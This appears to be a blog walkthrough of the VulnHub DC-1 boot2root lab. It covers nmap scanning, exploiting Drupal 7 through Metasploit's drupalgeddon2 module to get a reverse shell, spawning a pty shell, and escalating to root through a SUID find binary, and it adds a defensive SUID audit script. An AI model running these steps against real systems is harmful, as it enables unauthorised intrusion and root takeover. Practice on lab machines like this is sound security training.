DC-1 Walkthrough - By darkxploiter

Hello all, and thank you for reading this blog. Today I am going to complete another boot2root challenge, a box known as “DC-1”; all the credit goes to @DCAU for creating this box. Our challenge is to get root access to this machine. To download it, go to vulnhub.com

Or

https://www.vulnhub.com/?q=dc-1



This is a beginner-level machine.


Methods taken:


  1. nmap for IP discovery

  2. Network Scanning with nmap

  3. HTTP port surfing (port number 80)

  4. Finding Drupal CMS

  5. Finding Drupal version

  6. Finding exploit for Drupal version

  7. Exploiting with metasploit to get a reverse shell as a normal user

  8. Finding a way to get into the root shell

  9. Taking root shell and capturing the flag



Walkthrough steps:

Step 1:

IP discovery:


nmap -sn 192.168.56.1/24


Step 2:

Network Scanning:


Step 3:

If we look at the nmap result, we can see that port 80 is open, so we can browse to this port to see what is there. To check this, I am going to open the IP in my web browser. Here we can see that a Drupal CMS site is running.

I went through the page source but found nothing important, so I am not attaching a screenshot; you can check it yourself (on the web page press Ctrl+U).

If we take another look at the nmap result, we will see that a Drupal version 7 CMS is running. I googled for vulnerabilities in this specific version and found that there is an exploit in Metasploit, which is


exploit/unix/webapp/drupal_drupalgeddon2


Step 4:


Exploiting the target with this exploit:


First, use the exploit with the command use <name_of_the_exploit>

Check which options it requires with

show options

As we can see we need to set the RHOSTS and LHOST

msf6 > set RHOSTS 192.168.56.109

msf6 > set LHOST 192.168.56.101

Run show options again to check that every option is set successfully.

So everything looks fine here.

Now, exploit.

And we got the meterpreter shell.

Without wasting any time, I am going to drop to a system shell with the shell command.

It says that Channel 0 was created, which means we got the shell. Now, use python to spawn a bash shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Moving to the home directory and finding flags there.


Step 5:


Getting root:

find / -perm -u=s -type f 2>/dev/null

find is in the list with the SUID bit set and root permission, so we can exploit it to get root.
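
Seen from the defender's side, the same listing is an audit: any set-uid binary that is not on a known-good list deserves a look. The script below is an added example, not part of the original post; the allowlist and the sample listing are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit set-uid files against an allowlist (defender-side check).
# ASSUMPTION: this allowlist is illustrative; build yours from a known-good install.
SUID_ALLOWLIST="/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd"

# list_suid [ROOT]: the walkthrough's find command, limited to one filesystem.
list_suid() {
    find "${1:-/}" -xdev -perm -u=s -type f 2>/dev/null | sort
}

# unexpected_suid: read paths on stdin, print those missing from the allowlist.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        printf '%s\n' "$SUID_ALLOWLIST" | grep -Fxq -- "$path" \
            || printf '%s\n' "$path"
    done
}

# Constructed sample listing (not output captured from the DC-1 box).
sample_suid_listing() {
    cat <<'EOF'
/bin/mount
/bin/ping
/bin/su
/usr/bin/find
/usr/bin/passwd
EOF
}

# Stand-alone use: "sh audit.sh --sample" checks the sample, "--scan" the host.
case "${1:-}" in
    --sample) sample_suid_listing | unexpected_suid ;;
    --scan)   list_suid / | unexpected_suid ;;
esac
# A flagged binary that does not need the bit is fixed with: chmod u-s <path>
```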

Step 6:

Grabbing the root flag:


So many thanks to you for reading my blog. Have a nice day. :)

